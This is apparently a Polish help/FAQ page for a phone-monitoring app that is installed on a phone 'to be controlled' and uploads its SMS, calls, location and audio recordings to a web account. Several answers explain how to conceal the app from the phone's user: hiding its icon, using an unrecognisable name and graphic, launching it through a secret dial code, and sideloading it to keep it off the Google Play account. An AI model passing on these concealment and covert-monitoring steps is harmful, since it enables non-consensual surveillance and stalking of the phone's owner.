Pomoc

Konto użytkownika

  1. Nie otrzymałem linku aktywacyjnego
    Zarejestruj się ponownie z tym samym adresem e-mail. Link zostanie wysłany kolejny raz. Sprawdź folder ze spamem w programie pocztowym. Jeżeli nie masz wiadomości napisz do nas na e-mail.
  2. Czy muszę usuwać stare wiadomości SMS aby zapisały sie nowe?
    Nie, jeżeli nadejdzie nowa wiadomość, to najstarsza zostanie automatycznie usunięta. Twoje konto przechowyje maksymlaną ilość ostatnich wiadomości dla danego abonamentu.
  3. Nie dostaje żadnych nowych danych
    Jeżeli telefon jest nieaktywny - poczekaj pewien czas na nowe dane. Aplikacja w celu oszczędzania energi przesyła dane w odstępach 20 minutowych. Pamiętaj, że aplikacja nie wysyła danych sprzed instalacji.
  4. Czy muszę płacić za używanie konta?
    Nie, konto podtawowe jest bezpłatne. Jesteś jedynie ograniczony parametrami bezpłatnego abonamentu. Możesz jednak wykupić płatny abonament, pozwalający na gromadzenie większej ilości danych. Więcej informacji znajdziesz po zalogowaniu się do Twojego Konta.
  5. Telefon wyświetla się jako Nieaktywny. Dlaczego?
    Oznacza to, że od długiego czasu nie wysła on do konta żadnych sygnałów. Sprawdź czy telefon jest uruchomiony, czy ma dostęp do Internetu. Przeczytaj znane problemy techniczne wybranych telefonów.
  6. Jak odtworzyć zapisany dźwięk w formacie 3GP na systemie Windows
    Format ten można oddtworzyc na systemie Android bez żadnych dodatków. Na systemie Windos trzeba zinstalować odpwiedni player, na przykład: VLC Player.


Używanie aplikacji mobilnej

  1. Czy program jest widoczny w telefonie, na którym został zainstalowany?
    Można ukryć ikonę programu (zaznacz w programie "ptaszkiem" odpowiednie pole). Powoduje to brak wyświetlania ikony aplikacji w zainstalowanych programach. Ikona programu jest widoczna w menadżerze aplikacji, jednak jej nazwa i znak graficzny jest tak dobrany aby nie był rozpoznawalny.
  2. Jak uruchomić program gdy ikona jest ukryta?
    Jeżeli ikona aplikacji jest ukryta, możesz łatwo uruchomić program wybierając numer 111222# i wciskając przycisk połączenia.
    Program zostanie uruchomiony.
  3. Czy muszę instalować aplikację także na swoim telefonie czy tylko na telefonie który chcę kontrolować?
    Nie. Aplikację instaluje się wyłącznie na telefonie, który chcemy kontrolować.
    Wszystkie dane przeglądane są na tej stronie www.
  4. Dlaczego aplikacja nie zbiera danych z telefonu?
    Po instalacji czasami konieczne jest zrestartowanie telefonu. Aplikacja uruchomi się automatycznie w tle.
  5. Dlaczego nie mogę zaktualizować/odinstalować programu?
    Przed odinstalowaniem lub aktualizacją aplikacji należy przywrócić prezentowanie ikony programu (wyłączyć opcję ukrywania).
  6. Co się dzieje gdy telefon chwilami nie ma dostępu do internetu?
    Jeżeli Twój telefon nie posiada aktualnie połączenia z internetem, nie ma kłopotu, wszystkie dane są gromadzone. Zostaną przesłane do serwisu jak tylko telefon uzyska połączenie z internetem.
  7. Czy można używać Oprogramowania na kilku telefonach?
    Jedno konto (zewiązane z adresem e-mail) może być zainstalowane tylko na jednym telefonie. Zmiana numeru czy karty sim nie powinna mieć wpływu na jego działanie.
    Jeżeli potrzbujesz uruchomić program na kilku telefonach, musisz założ odpowiednią ilość konto kllienta.
  8. Czy muszę fizycznie posiadać telefon, na którym ma działać program?
    Tak, na telefonie należy zainstalować bezpłatne oprogramowanie pobierając je z Google Play™. Po uruchomieniu zarejestrować lub zalogować się istniejącym kontem. Trwa to kilkadziesiąt sekund.
  9. Program jest widoczny na liście zarządzania aplikacjami i na koncie Google Play...
    Możesz zainstalowac aplikację bez uzycia Google Play. Czytaj instrukcję.
  10. Wszystkie polecenia zdalne zwracają błąd...
    Twój telefon nie ma połaczenia z internetem lub jest wyłączony. Aplikacja mogła zostać odintalowana.
  11. Nie widzę lokalizacji telefonu
    Uaktywnij "Usługi lokalizacji" w ustawieniach telefonu. Dokładność pomiaru lokalizacji zalezna jest od dostępności modułu GPS i widoczności satelit.
  12. Chcę wykonywać polecenia ale nie chcę gromadzić danych o SMSach i połączeniach.
    App Settings
    przejdź do utawień aplikacji klikając w "menu". Odznacz niechciane funkcje.